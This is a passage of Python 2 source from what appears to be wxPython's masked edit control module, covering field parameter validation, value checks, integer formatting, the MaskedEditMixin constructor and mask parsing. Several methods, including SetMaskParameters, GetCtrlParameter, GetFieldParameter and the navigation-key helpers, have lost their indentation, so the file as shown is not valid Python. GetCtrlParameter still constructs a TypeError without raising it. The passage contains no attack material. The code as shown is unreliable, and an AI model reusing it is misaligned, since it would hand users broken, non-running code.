            self._shiftDecimalChar = kwargs['shiftDecimalChar']

        if kwargs.has_key('formatcodes') or kwargs.has_key('validRegex'):
            self._regexMask = 'V' in self._formatcodes and self._validRegex

        if kwargs.has_key('fillChar'):
            self._old_fillChar = old_fillChar
####            dbg("self._old_fillChar: '%s'" % self._old_fillChar)

        if kwargs.has_key('mask') or kwargs.has_key('validRegex'):  # (set/changed)
            self._isInt = _isInteger(self._mask)
##            dbg('isInt?', self._isInt, 'self._mask:"%s"' % self._mask)

##        dbg(indent=0, suspend=0)

    def _ValidateParameters(self, **kwargs):
        """
        This function can be used to validate individual or multiple parameters for
        a masked edit field parameter after construction.
        """
##        dbg(suspend=1)
##        dbg('maskededit.Field::_ValidateParameters', indent=1)
##        if self._index is not None: dbg('field index:', self._index)
####        dbg('parameters:', indent=1)
##        for key, value in kwargs.items():
####            dbg('%s:' % key, value)
####        dbg(indent=0)
####        dbg("self._old_fillChar: '%s'" % self._old_fillChar)

        # Verify proper numeric format params:
        if self._groupdigits and self._groupChar == self._decimalChar:
##            dbg(indent=0, suspend=0)
            ae = AttributeError("groupChar '%s' cannot be the same as decimalChar '%s'" % (self._groupChar, self._decimalChar))
            ae.attribute = self._groupChar
            raise ae

        # Now go do validation, semantic and inter-dependency parameter processing:
        if kwargs.has_key('choices') or kwargs.has_key('compareNoCase') or kwargs.has_key('choiceRequired'): # (set/changed)
            self._compareChoices = [choice.strip() for choice in self._choices]
            if self._compareNoCase and self._choices:
                self._compareChoices = [item.lower() for item in self._compareChoices]
            if kwargs.has_key('choices'):
                self._autoCompleteIndex = -1

        if kwargs.has_key('validRegex'):    # (set/changed)
            if self._validRegex:
                try:
                    if self._compareNoCase:
                        self._filter = re.compile(self._validRegex, re.IGNORECASE)
                    else:
                        self._filter = re.compile(self._validRegex)
                # Only trap bad regular expressions; other exceptions should propagate.
                except re.error:
##                    dbg(indent=0, suspend=0)
                    raise TypeError('%s: validRegex "%s" not a legal regular expression' % (str(self._index), self._validRegex))
            else:
                self._filter = None

        if kwargs.has_key('validRange'):    # (set/changed)
            self._hasRange = False
            self._rangeHigh = 0
            self._rangeLow = 0
            if self._validRange:
                if type(self._validRange) != types.TupleType or len( self._validRange )!= 2 or self._validRange[0] > self._validRange[1]:
##                    dbg(indent=0, suspend=0)
                    raise TypeError('%s: validRange %s parameter must be tuple of form (a,b) where a <= b'
                                    % (str(self._index), repr(self._validRange)) )
                self._hasRange = True
                self._rangeLow = self._validRange[0]
                self._rangeHigh = self._validRange[1]

        if kwargs.has_key('choices') or (len(self._choices) and len(self._choices[0]) != len(self._mask)):  # (set/changed)
            self._hasList = False
            if self._choices and type(self._choices) not in (types.TupleType, types.ListType):
##                dbg(indent=0, suspend=0)
                raise TypeError('%s: choices must be a sequence of strings' % str(self._index))
            elif len( self._choices) > 0:
                for choice in self._choices:
                    if type(choice) not in (types.StringType, types.UnicodeType):
##                        dbg(indent=0, suspend=0)
                        raise TypeError('%s: choices must be a sequence of strings' % str(self._index))

                length = len(self._mask)
##                dbg('len(%s)' % self._mask, length, 'len(self._choices):', len(self._choices), 'length:', length, 'self._alignRight?', self._alignRight)
                if len(self._choices) and length:
                    if len(self._choices[0]) > length:
                        # changed mask without respecifying choices; readjust the width as appropriate:
                        self._choices = [choice.strip() for choice in self._choices]
                    if self._alignRight:
                        self._choices = [choice.rjust( length ) for choice in self._choices]
                    else:
                        self._choices = [choice.ljust( length ) for choice in self._choices]
##                    dbg('aligned choices:', self._choices)

                if hasattr(self, '_template'):
                    # Verify each choice specified is valid:
                    for choice in self._choices:
                        if self.IsEmpty(choice) and not self._validRequired:
                            # allow empty values even if invalid, (just colored differently)
                            continue
                        if not self.IsValid(choice):
##                            dbg(indent=0, suspend=0)
                            ve = ValueError('%s: "%s" is not a valid value for the control as specified.' % (str(self._index), choice))
                            ve.value = choice
                            raise ve
                self._hasList = True

####        dbg("kwargs.has_key('fillChar')?", kwargs.has_key('fillChar'), "len(self._choices) > 0?", len(self._choices) > 0)
####        dbg("self._old_fillChar:'%s'" % self._old_fillChar, "self._fillChar: '%s'" % self._fillChar)
        if kwargs.has_key('fillChar') and len(self._choices) > 0:
            if kwargs['fillChar'] != ' ':
                self._choices = [choice.replace(' ', self._fillChar) for choice in self._choices]
            else:
                self._choices = [choice.replace(self._old_fillChar, self._fillChar) for choice in self._choices]
##            dbg('updated choices:', self._choices)

        if kwargs.has_key('autoSelect') and kwargs['autoSelect']:
            if not self._hasList:
##                dbg('no list to auto complete; ignoring "autoSelect=True"')
                self._autoSelect = False

        # reset field validity assumption:
        self._valid = True
##        dbg(indent=0, suspend=0)

    def _GetParameter(self, paramname):
        """
        Routine for retrieving the value of any given parameter.
        Raises TypeError for an unrecognized parameter name.
        """
        if Field.valid_params.has_key(paramname):
            return getattr(self, '_' + paramname)
        else:
            # Previously the TypeError was constructed but never raised (and
            # referenced an undefined name), so bad parameter names failed
            # silently (or with a NameError).  Raise it explicitly:
            raise TypeError('Field._GetParameter: invalid parameter "%s"' % paramname)

    def IsEmpty(self, slice):
        """
        Indicates whether the specified slice is considered empty for the
        field.
        """
##        dbg('Field::IsEmpty("%s")' % slice, indent=1)
        if not hasattr(self, '_template'):
##            dbg(indent=0)
            raise AttributeError('_template')

##        dbg('self._template: "%s"' % self._template)
##        dbg('self._defaultValue: "%s"' % str(self._defaultValue))
        if slice == self._template and not self._defaultValue:
##            dbg(indent=0)
            return True

        elif slice == self._template:
            empty = True
            for pos in range(len(self._template)):
####                dbg('slice[%(pos)d] != self._fillChar?' %locals(), slice[pos] != self._fillChar[pos])
                if slice[pos] not in (' ', self._fillChar):
                    empty = False
                    break
##            dbg("IsEmpty? %(empty)d (do all mask chars == fillChar?)" % locals(), indent=0)
            return empty
        else:
##            dbg("IsEmpty? 0 (slice doesn't match template)", indent=0)
            return False

    def IsValid(self, slice):
        """
        Indicates whether the specified slice is considered a valid value for the
        field.
        """
##        dbg(suspend=1)
##        dbg('Field[%s]::IsValid("%s")' % (str(self._index), slice), indent=1)
        valid = True    # assume true to start

        if self.IsEmpty(slice):
##            dbg(indent=0, suspend=0)
            if self._emptyInvalid:
                return False
            else:
                return True

        elif self._hasList and self._choiceRequired:
##            dbg("(member of list required)")
            # do case-insensitive match on list; strip surrounding whitespace from slice (already done for choices):
            if self._fillChar != ' ':
                slice = slice.replace(self._fillChar, ' ')
##                dbg('updated slice:"%s"' % slice)
            compareStr = slice.strip()

            if self._compareNoCase:
                compareStr = compareStr.lower()
            valid = compareStr in self._compareChoices

        elif self._hasRange and not self.IsEmpty(slice):
##            dbg('validating against range')
            try:
                # allow float as well as int ranges (int comparisons for free.)
                valid = self._rangeLow <= float(slice) <= self._rangeHigh
            except:
                valid = False

        elif self._validRegex and self._filter:
##            dbg('validating against regex')
            valid = (re.match( self._filter, slice) is not None)

        if valid and self._validFunc:
##            dbg('validating against supplied function')
            valid = self._validFunc(slice)
##        dbg('valid?', valid, indent=0, suspend=0)
        return valid

    def _AdjustField(self, slice):
        """ 'Fixes' an integer field. Right or left-justifies, as required."""
##        dbg('Field::_AdjustField("%s")' % slice, indent=1)
        length = len(self._mask)
####        dbg('length(self._mask):', length)
####        dbg('self._useParensForNegatives?', self._useParensForNegatives)
        if self._isInt:
            if self._useParensForNegatives:
                signpos = slice.find('(')
                right_signpos = slice.find(')')
                intStr = slice.replace('(', '').replace(')', '')    # drop sign, if any
            else:
                signpos = slice.find('-')
                intStr = slice.replace( '-', '' )                   # drop sign, if any
                right_signpos = -1

            # Strip formatting characters; use the string *method* replace
            # (equivalent to the old Python-2-only string.replace module calls,
            # and consistent with the lines above):
            intStr = intStr.replace(' ', '')                        # drop extra spaces
            intStr = intStr.replace(self._fillChar, "")             # drop extra fillchars
            intStr = intStr.replace("-", "")                        # drop sign, if any (parens path may still have one)
            intStr = intStr.replace(self._groupChar, "")            # lose commas/dots
####            dbg('intStr:"%s"' % intStr)
            start, end = self._extent
            field_len = end - start
            if not self._padZero and len(intStr) != field_len and intStr.strip():
                intStr = str(long(intStr))
####            dbg('raw int str: "%s"' % intStr)
####            dbg('self._groupdigits:', self._groupdigits, 'self._formatcodes:', self._formatcodes)
            if self._groupdigits:
                new = ''
                cnt = 1
                for i in range(len(intStr)-1, -1, -1):
                    new = intStr[i] + new
                    if (cnt) % 3 == 0:
                        new = self._groupChar + new
                    cnt += 1
                if new and new[0] == self._groupChar:
                    new = new[1:]
                if len(new) <= length:
                    # expanded string will still fit and leave room for sign:
                    intStr = new
                # else... leave it without the commas...

##            dbg('padzero?', self._padZero)
##            dbg('len(intStr):', len(intStr), 'field length:', length)
            if self._padZero and len(intStr) < length:
                intStr = '0' * (length - len(intStr)) + intStr
                if signpos != -1:   # we had a sign before; restore it
                    if self._useParensForNegatives:
                        intStr = '(' + intStr[1:]
                        if right_signpos != -1:
                            intStr += ')'
                    else:
                        intStr = '-' + intStr[1:]
            elif signpos != -1 and slice[0:signpos].strip() == '':  # - was before digits
                if self._useParensForNegatives:
                    intStr = '(' + intStr
                    if right_signpos != -1:
                        intStr += ')'
                else:
                    intStr = '-' + intStr
            elif right_signpos != -1:
                # must have had ')' but '(' was before field; re-add ')'
                intStr += ')'
            slice = intStr

        slice = slice.strip()   # drop extra spaces

        if self._alignRight:    ## Only if right-alignment is enabled
            slice = slice.rjust( length )
        else:
            slice = slice.ljust( length )
        if self._fillChar != ' ':
            slice = slice.replace(' ', self._fillChar)
##        dbg('adjusted slice: "%s"' % slice, indent=0)
        return slice
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class MaskedEditMixin:
    """
    This class allows us to abstract the masked edit functionality that could
    be associated with any text entry control. (eg. wx.TextCtrl, wx.ComboBox, etc.)
    It forms the basis for all of the lib.masked controls.
    """
    # Map of every control-level keyword parameter to its default value.
    # Used both to validate keyword arguments (in __init__ and
    # SetCtrlParameters) and to populate per-instance defaults: each
    # instance gets a '_'-prefixed copy of every entry (e.g. self._mask,
    # self._demo).
    valid_ctrl_params = {
        'mask': 'XXXXXXXXXXXXX',            ## mask string for formatting this control
        'autoformat': "",                   ## optional auto-format code to set format from masktags dictionary
        'fields': {},                       ## optional list/dictionary of maskededit.Field class instances, indexed by position in mask
        'datestyle': 'MDY',                 ## optional date style for date-type values. Can trigger autocomplete year
        'autoCompleteKeycodes': [],         ## Optional list of additional keycodes which will invoke field-auto-complete
        'useFixedWidthFont': True,          ## Use fixed-width font instead of default for base control
        'defaultEncoding': 'latin1',        ## optional argument to indicate unicode codec to use (unicode ctrls only)
        'retainFieldValidation': False,     ## Set this to true if setting control-level parameters independently,
                                            ## from field validation constraints
        'emptyBackgroundColour': "White",
        'validBackgroundColour': "White",
        'invalidBackgroundColour': "Yellow",
        'foregroundColour': "Black",
        'signedForegroundColour': "Red",
        'demo': False}
    def __init__(self, name = 'MaskedEdit', **kwargs):
        """
        This is the "constructor" for setting up the mixin variable parameters for the composite class.

        name    is used only to identify this control in error messages.
        kwargs  may contain any control-level parameter (see
                valid_ctrl_params) or field-level parameter (see
                Field.valid_params); any other keyword raises TypeError.
        """
        self.name = name
        # set up flag for doing optional things to base control if possible
        if not hasattr(self, 'controlInitialized'):
            self.controlInitialized = False
        # Set internal state var for keeping track of whether or not a character
        # action results in a modification of the control, since .SetValue()
        # doesn't modify the base control's internal state:
        self.modified = False
        self._previous_mask = None
        # Validate legitimate set of parameters (American 'Color' spelling is
        # normalized to 'Colour' before checking):
        for key in kwargs.keys():
            if key.replace('Color', 'Colour') not in MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys():
                raise TypeError('%s: invalid parameter "%s"' % (name, key))
        ## Set up dictionary that can be used by subclasses to override or add to default
        ## behavior for individual characters.  Derived subclasses needing to change
        ## default behavior for keys can either redefine the default functions for the
        ## common keys or add functions for specific keys to this list.  Each function
        ## added should take the key event as argument, and return False if the key
        ## requires no further processing.
        ##
        ## Initially populated with navigation and function control keys:
        self._keyhandlers = {
            # default navigation keys and handlers:
            wx.WXK_BACK:   self._OnErase,
            wx.WXK_LEFT:   self._OnArrow,
            wx.WXK_NUMPAD_LEFT:   self._OnArrow,
            wx.WXK_RIGHT:  self._OnArrow,
            wx.WXK_NUMPAD_RIGHT:  self._OnArrow,
            wx.WXK_UP:     self._OnAutoCompleteField,
            wx.WXK_NUMPAD_UP:     self._OnAutoCompleteField,
            wx.WXK_DOWN:   self._OnAutoCompleteField,
            wx.WXK_NUMPAD_DOWN:   self._OnAutoCompleteField,
            wx.WXK_TAB:    self._OnChangeField,
            wx.WXK_HOME:   self._OnHome,
            wx.WXK_NUMPAD_HOME:   self._OnHome,
            wx.WXK_END:    self._OnEnd,
            wx.WXK_NUMPAD_END:    self._OnEnd,
            wx.WXK_RETURN: self._OnReturn,
            wx.WXK_NUMPAD_ENTER:  self._OnReturn,
            wx.WXK_PRIOR:  self._OnAutoCompleteField,
            wx.WXK_NUMPAD_PRIOR:  self._OnAutoCompleteField,
            wx.WXK_NEXT:   self._OnAutoCompleteField,
            wx.WXK_NUMPAD_NEXT:   self._OnAutoCompleteField,
            # default function control keys and handlers:
            wx.WXK_DELETE: self._OnDelete,
            wx.WXK_NUMPAD_DELETE: self._OnDelete,
            wx.WXK_INSERT: self._OnInsert,
            wx.WXK_NUMPAD_INSERT: self._OnInsert,
            WXK_CTRL_A: self._OnCtrl_A,
            WXK_CTRL_C: self._OnCtrl_C,
            WXK_CTRL_S: self._OnCtrl_S,
            WXK_CTRL_V: self._OnCtrl_V,
            WXK_CTRL_X: self._OnCtrl_X,
            WXK_CTRL_Z: self._OnCtrl_Z,
            }
        ## bind standard navigational and control keycodes to this instance,
        ## so that they can be augmented and/or changed in derived classes:
        self._nav = list(nav)
        self._control = list(control)
        ## Dynamically evaluate and store string constants for mask chars
        ## so that locale settings can be made after this module is imported
        ## and the controls created after that is done can allow the
        ## appropriate characters:
        self.maskchardict = {
            '#': string.digits,
            'A': string.uppercase,
            'a': string.lowercase,
            'X': string.letters + string.punctuation + string.digits,
            'C': string.letters,
            'N': string.letters + string.digits,
            '&': string.punctuation,
            '*': ansichars      # to give it a value, but now allows any non-wxcontrol character
        }
        ## self._ignoreChange is used by MaskedComboBox, because
        ## of the hack necessary to determine the selection; it causes
        ## EVT_TEXT messages from the combobox to be ignored if set.
        self._ignoreChange = False
        # These are used to keep track of previous value, for undo functionality:
        self._curValue  = None
        self._prevValue = None
        self._valid     = True
        # Set defaults for each parameter for this instance, and fully
        # populate initial parameter list for configuration:
        for key, value in MaskedEditMixin.valid_ctrl_params.items():
            # copy.copy() so mutable defaults (lists/dicts) aren't shared
            # between instances:
            setattr(self, '_' + key, copy.copy(value))
            if not kwargs.has_key(key):
####                dbg('%s: "%s"' % (key, repr(value)))
                kwargs[key] = copy.copy(value)
        # Create a "field" that holds global parameters for control constraints
        self._ctrl_constraints = self._fields[-1] = Field(index=-1)
        self.SetCtrlParameters(**kwargs)
    def SetCtrlParameters(self, **kwargs):
        """
        This public function can be used to set individual or multiple masked edit
        parameters after construction. (See maskededit module overview for the list
        of valid parameters.)

        Raises AttributeError for an unknown keyword or an invalid
        'autoformat' code, and TypeError for a bad 'fields' value or an
        illegal colour specification.
        """
##        dbg(suspend=1)
##        dbg('MaskedEditMixin::SetCtrlParameters', indent=1)
####        dbg('kwargs:', indent=1)
##        for key, value in kwargs.items():
####            dbg(key, '=', value)
####        dbg(indent=0)
        # Validate keyword arguments, splitting them into field-level
        # constraint parameters and control-level parameters:
        constraint_kwargs = {}
        ctrl_kwargs = {}
        for key, value in kwargs.items():
            key = key.replace('Color', 'Colour')    # for b-c, and standard wxPython spelling
            if key not in MaskedEditMixin.valid_ctrl_params.keys() + Field.valid_params.keys():
##                dbg(indent=0, suspend=0)
                ae = AttributeError('Invalid keyword argument "%s" for control "%s"' % (key, self.name))
                ae.attribute = key
                raise ae
            elif key in Field.valid_params.keys():
                constraint_kwargs[key] = value
            else:
                ctrl_kwargs[key] = value
        mask = None
        reset_args = {}
        if ctrl_kwargs.has_key('autoformat'):
            autoformat = ctrl_kwargs['autoformat']
        else:
            autoformat = None
        # handle "parochial name" backward compatibility:
        if autoformat and autoformat.find('MILTIME') != -1 and autoformat not in masktags.keys():
            autoformat = autoformat.replace('MILTIME', '24HRTIME')
        if autoformat != self._autoformat and autoformat in masktags.keys():
##            dbg('autoformat:', autoformat)
            self._autoformat = autoformat
            mask = masktags[self._autoformat]['mask']
            # gather rest of any autoformat parameters:
            for param, value in masktags[self._autoformat].items():
                if param == 'mask': continue    # (must be present; already accounted for)
                constraint_kwargs[param] = value
        elif autoformat and not autoformat in masktags.keys():
            ae = AttributeError('invalid value for autoformat parameter: %s' % repr(autoformat))
            ae.attribute = autoformat
            raise ae
        else:
##            dbg('autoformat not selected')
            if kwargs.has_key('mask'):
                mask = kwargs['mask']
##                dbg('mask:', mask)
        ## Assign style flags
        if mask is None:
##            dbg('preserving previous mask')
            mask = self._previous_mask    # preserve previous mask
        else:
##            dbg('mask (re)set')
            reset_args['reset_mask'] = mask
            constraint_kwargs['mask'] = mask
            # wipe out previous fields; preserve new control-level constraints
            self._fields = {-1: self._ctrl_constraints}
        if ctrl_kwargs.has_key('fields'):
            # do field parameter type validation, and conversion to internal dictionary
            # as appropriate:
            fields = ctrl_kwargs['fields']
            if type(fields) in (types.ListType, types.TupleType):
                for i in range(len(fields)):
                    field = fields[i]
                    if not isinstance(field, Field):
##                        dbg(indent=0, suspend=0)
                        raise TypeError('invalid type for field parameter: %s' % repr(field))
                    self._fields[i] = field
            elif type(fields) == types.DictionaryType:
                for index, field in fields.items():
                    if not isinstance(field, Field):
##                        dbg(indent=0, suspend=0)
                        raise TypeError('invalid type for field parameter: %s' % repr(field))
                    self._fields[index] = field
            else:
##                dbg(indent=0, suspend=0)
                raise TypeError('fields parameter must be a list or dictionary; not %s' % repr(fields))
        # Assign constraint parameters for entire control:
####        dbg('control constraints:', indent=1)
##        for key, value in constraint_kwargs.items():
####            dbg('%s:' % key, value)
####        dbg(indent=0)
        # determine if changing parameters that should affect the entire control:
        for key in MaskedEditMixin.valid_ctrl_params.keys():
            if key in ( 'mask', 'fields' ): continue    # (processed separately)
            if ctrl_kwargs.has_key(key):
                setattr(self, '_' + key, ctrl_kwargs[key])
        # Validate color parameters, converting strings to named colors and validating
        # result if appropriate:
        for key in ('emptyBackgroundColour', 'invalidBackgroundColour', 'validBackgroundColour',
                    'foregroundColour', 'signedForegroundColour'):
            if ctrl_kwargs.has_key(key):
                if type(ctrl_kwargs[key]) in (types.StringType, types.UnicodeType):
                    c = wx.NamedColour(ctrl_kwargs[key])
                    # (-1,-1,-1) is wx's sentinel for "no such named colour":
                    if c.Get() == (-1, -1, -1):
                        raise TypeError('%s not a legal color specification for %s' % (repr(ctrl_kwargs[key]), key))
                    else:
                        # replace attribute with wxColour object:
                        setattr(self, '_' + key, c)
                        # attach a python dynamic attribute to wxColour for debug printouts
                        c._name = ctrl_kwargs[key]
                elif type(ctrl_kwargs[key]) != type(wx.BLACK):
                    raise TypeError('%s not a legal color specification for %s' % (repr(ctrl_kwargs[key]), key))
##        dbg('self._retainFieldValidation:', self._retainFieldValidation)
        if not self._retainFieldValidation:
            # Build dictionary of any changing parameters which should be propagated to the
            # component fields:
            for arg in Field.propagating_params:
####                dbg('kwargs.has_key(%s)?' % arg, kwargs.has_key(arg))
####                dbg('getattr(self._ctrl_constraints, _%s)?' % arg, getattr(self._ctrl_constraints, '_'+arg))
                reset_args[arg] = kwargs.has_key(arg) and kwargs[arg] != getattr(self._ctrl_constraints, '_'+arg)
####                dbg('reset_args[%s]?' % arg, reset_args[arg])
        # Set the control-level constraints:
        self._ctrl_constraints._SetParameters(**constraint_kwargs)
        # This routine does the bulk of the interdependent parameter processing, determining
        # the field extents of the mask if changed, resetting parameters as appropriate,
        # determining the overall template value for the control, etc.
        self._configure(mask, **reset_args)
        # now that we've propagated the field constraints and mask portions to the
        # various fields, validate the constraints
        self._ctrl_constraints._ValidateParameters(**constraint_kwargs)
        # Validate that all choices for given fields are at least of the
        # necessary length, and that they all would be valid pastes if pasted
        # into their respective fields:
####        dbg('validating choices')
        self._validateChoices()
        # Derive convenience flags from the (possibly new) mask/format codes:
        self._autofit = self._ctrl_constraints._autofit
        self._isNeg = False
        self._isDate = 'D' in self._ctrl_constraints._formatcodes and _isDateType(mask)
        self._isTime = 'T' in self._ctrl_constraints._formatcodes and _isTimeType(mask)
        if self._isDate:
            # Set _dateExtent, used in date validation to locate date in string;
            # always set as though year will be 4 digits, even if mask only has
            # 2 digits, so we can always properly process the intended year for
            # date validation (leap years, etc.)
            if self._mask.find('CCC') != -1: self._dateExtent = 11
            else:                            self._dateExtent = 10
            self._4digityear = len(self._mask) > 8 and self._mask[9] == '#'
        if self._isDate and self._autoformat:
            # Auto-decide datestyle:
            if self._autoformat.find('MDDY')    != -1: self._datestyle = 'MDY'
            elif self._autoformat.find('YMMD')  != -1: self._datestyle = 'YMD'
            elif self._autoformat.find('YMMMD') != -1: self._datestyle = 'YMD'
            elif self._autoformat.find('DMMY')  != -1: self._datestyle = 'DMY'
            elif self._autoformat.find('DMMMY') != -1: self._datestyle = 'DMY'
        # Give derived controls a chance to react to parameter changes before
        # potentially changing current value of the control.
        self._OnCtrlParametersChanged()
        if self.controlInitialized:
            # Then the base control is available for configuration;
            # take action on base control based on new settings, as appropriate.
            if kwargs.has_key('useFixedWidthFont'):
                # Set control font - fixed width by default
                self._setFont()
            if reset_args.has_key('reset_mask'):
##                dbg('reset mask')
                curvalue = self._GetValue()
                if curvalue.strip():
                    try:
##                        dbg('attempting to _SetInitialValue(%s)' % self._GetValue())
                        self._SetInitialValue(self._GetValue())
                    # NOTE: Python 2-only except syntax, kept as-is:
                    except Exception, e:
##                        dbg('exception caught:', e)
##                        dbg("current value doesn't work; attempting to reset to template")
                        self._SetInitialValue()
                else:
##                    dbg('attempting to _SetInitialValue() with template')
                    self._SetInitialValue()
            elif kwargs.has_key('useParensForNegatives'):
                newvalue = self._getSignedValue()[0]
                if newvalue is not None:
                    # Adjust for new mask:
                    if len(newvalue) < len(self._mask):
                        newvalue += ' '
                    elif len(newvalue) > len(self._mask):
                        if newvalue[-1] in (' ', ')'):
                            newvalue = newvalue[:-1]
##                    dbg('reconfiguring value for parens:"%s"' % newvalue)
                    self._SetValue(newvalue)
                    if self._prevValue != newvalue:
                        self._prevValue = newvalue  # disallow undo of sign type
            if self._autofit:
##                dbg('calculated size:', self._CalcSize())
                self.SetClientSize(self._CalcSize())
                width = self.GetSize().width
                height = self.GetBestSize().height
##                dbg('setting client size to:', (width, height))
                self.SetInitialSize((width, height))
            # Set value/type-specific formatting
            self._applyFormatting()
##        dbg(indent=0, suspend=0)
def SetMaskParameters(self, **kwargs):
""" old name for the SetCtrlParameters function (DEPRECATED)"""
return self.SetCtrlParameters(**kwargs)
def GetCtrlParameter(self, paramname):
"""
Routine for retrieving the value of any given parameter
"""
if MaskedEditMixin.valid_ctrl_params.has_key(paramname.replace('Color','Colour')):
return getattr(self, '_' + paramname.replace('Color', 'Colour'))
elif Field.valid_params.has_key(paramname):
return self._ctrl_constraints._GetParameter(paramname)
else:
TypeError('"%s".GetCtrlParameter: invalid parameter "%s"' % (self.name, paramname))
def GetMaskParameter(self, paramname):
""" old name for the GetCtrlParameters function (DEPRECATED)"""
return self.GetCtrlParameter(paramname)
## This idea worked, but Boa was unable to use this solution...
## def _attachMethod(self, func):
## import new
## setattr(self, func.__name__, new.instancemethod(func, self, self.__class__))
##
##
## def _DefinePropertyFunctions(exposed_params):
## for param in exposed_params:
## propname = param[0].upper() + param[1:]
##
## exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
## exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## self._attachMethod(locals()['Set%s' % propname])
## self._attachMethod(locals()['Get%s' % propname])
##
## if param.find('Colour') != -1:
## # add non-british spellings, for backward-compatibility
## propname.replace('Colour', 'Color')
##
## exec('def Set%s(self, value): self.SetCtrlParameters(%s=value)' % (propname, param))
## exec('def Get%s(self): return self.GetCtrlParameter("%s")''' % (propname, param))
## self._attachMethod(locals()['Set%s' % propname])
## self._attachMethod(locals()['Get%s' % propname])
##
    def SetFieldParameters(self, field_index, **kwargs):
        """
        Routine provided to modify the parameters of a given field.
        Because changes to fields can affect the overall control,
        direct access to the fields is prevented, and the control
        is always "reconfigured" after setting a field parameter.
        (See maskededit module overview for the list of valid field-level
        parameters.)

        Raises IndexError if field_index is not a valid field for this
        control's mask.
        """
        if field_index not in self._field_indices:
            ie = IndexError('%s is not a valid field for control "%s".' % (str(field_index), self.name))
            ie.index = field_index
            raise ie
        # set parameters as requested:
        self._fields[field_index]._SetParameters(**kwargs)
        # Possibly reprogram control template due to resulting changes, and ensure
        # control-level params are still propagated to fields:
        self._configure(self._previous_mask)
        self._fields[field_index]._ValidateParameters(**kwargs)
        if self.controlInitialized:
            if kwargs.has_key('fillChar') or kwargs.has_key('defaultValue'):
                # These parameters change the template, so the displayed
                # value must be re-derived:
                self._SetInitialValue()
                if self._autofit:
                    # this is tricky, because, as Robin explains:
                    # "Basically there are two sizes to deal with, that are potentially
                    #  different.  The client size is the inside size and may, depending
                    #  on platform, exclude the borders and such.  The normal size is
                    #  the outside size that does include the borders.  What you are
                    #  calculating (in _CalcSize) is the client size, but the sizers
                    #  deal with the full size and so that is the minimum size that
                    #  we need to set with SetInitialSize.  The root of the problem is
                    #  that in _calcSize the current client size height is returned,
                    #  instead of a height based on the current font.  So I suggest using
                    #  _calcSize to just get the width, and then use GetBestSize to
                    #  get the height."
                    self.SetClientSize(self._CalcSize())
                    width = self.GetSize().width
                    height = self.GetBestSize().height
                    self.SetInitialSize((width, height))
            # Set value/type-specific formatting
            self._applyFormatting()
def GetFieldParameter(self, field_index, paramname):
"""
Routine provided for getting a parameter of an individual field.
"""
if field_index not in self._field_indices:
ie = IndexError('%s is not a valid field for control "%s".' % (str(field_index), self.name))
ie.index = field_index
raise ie
elif Field.valid_params.has_key(paramname):
return self._fields[field_index]._GetParameter(paramname)
else:
ae = AttributeError('"%s".GetFieldParameter: invalid parameter "%s"' % (self.name, paramname))
ae.attribute = paramname
raise ae
def _SetKeycodeHandler(self, keycode, func):
"""
This function adds and/or replaces key event handling functions
used by the control. <func> should take the event as argument
and return False if no further action on the key is necessary.
"""
if func:
self._keyhandlers[keycode] = func
elif self._keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
def _SetKeyHandler(self, char, func):
"""
This function adds and/or replaces key event handling functions
for ascii characters. <func> should take the event as argument
and return False if no further action on the key is necessary.
"""
self._SetKeycodeHandler(ord(char), func)
def _AddNavKeycode(self, keycode, handler=None):
"""
This function allows a derived subclass to augment the list of
keycodes that are considered "navigational" keys.
"""
self._nav.append(keycode)
if handler:
self._keyhandlers[keycode] = handler
elif self.keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
def _AddNavKey(self, char, handler=None):
"""
This function is a convenience function so you don't have to
remember to call ord() for ascii chars to be used for navigation.
"""
self._AddNavKeycode(ord(char), handler)
def _GetNavKeycodes(self):
"""
This function retrieves the current list of navigational keycodes for
the control.
"""
return self._nav
def _SetNavKeycodes(self, keycode_func_tuples):
"""
This function allows you to replace the current list of keycode processed
as navigation keys, and bind associated optional keyhandlers.
"""
self._nav = []
for keycode, func in keycode_func_tuples:
self._nav.append(keycode)
if func:
self._keyhandlers[keycode] = func
elif self.keyhandlers.has_key(keycode):
del self._keyhandlers[keycode]
    def _processMask(self, mask):
        """
        This subroutine expands {n} syntax in mask strings, and looks for escaped
        special characters and returns the expanded mask, and an dictionary
        of booleans indicating whether or not a given position in the mask is
        a mask character or not.

        Returns a 3-tuple:
          (expanded mask string,
           dict position -> bool "is a mask character",
           list of positions that are explicit '|' field boundaries)

        Side effects: sets several control-level flags derived from the
        mask (_isFloat, _isInt, _signOk, _useParens, _isNeg, _signpos,
        _decimalChar, _shiftDecimalChar).
        """
##        dbg('_processMask: mask', mask, indent=1)
        # regular expression for parsing c{n} syntax:
        rex = re.compile('([' +string.join(maskchars,"") + '])\{(\d+)\}')
        s = mask
        match = rex.search(s)
        while match:                        # found an(other) occurrence
            maskchr = s[match.start(1):match.end(1)]            # char to be repeated
            repcount = int(s[match.start(2):match.end(2)])      # the number of times
            replacement = string.join( maskchr * repcount, "")  # the resulting substr
            s = s[:match.start(1)] + replacement + s[match.end(2)+1:]   #account for trailing '}'
            match = rex.search(s)                               # look for another such entry in mask
        self._decimalChar = self._ctrl_constraints._decimalChar
        self._shiftDecimalChar = self._ctrl_constraints._shiftDecimalChar
        # numeric handling is disabled when an explicit validation regex is set:
        self._isFloat = _isFloatingPoint(s) and not self._ctrl_constraints._validRegex
        self._isInt = _isInteger(s) and not self._ctrl_constraints._validRegex
        self._signOk = '-' in self._ctrl_constraints._formatcodes and (self._isFloat or self._isInt)
        self._useParens = self._ctrl_constraints._useParensForNegatives
        self._isNeg = False
####        dbg('self._signOk?', self._signOk, 'self._useParens?', self._useParens)
####        dbg('isFloatingPoint(%s)?' % (s), _isFloatingPoint(s),
##            'ctrl regex:', self._ctrl_constraints._validRegex)
        if self._signOk and s[0] != ' ':
            # reserve a leading position for the sign character:
            s = ' ' + s
            if self._ctrl_constraints._defaultValue and self._ctrl_constraints._defaultValue[0] != ' ':
                self._ctrl_constraints._defaultValue = ' ' + self._ctrl_constraints._defaultValue
            self._signpos = 0
            if self._useParens:
                # reserve a trailing position for the closing paren:
                s += ' '
                self._ctrl_constraints._defaultValue += ' '
        # Now, go build up a dictionary of booleans, indexed by position,
        # indicating whether or not a given position is masked or not.
        # Also, strip out any '|' chars, adjusting the mask as necessary,
        # marking the appropriate positions for field boundaries:
        ismasked = {}
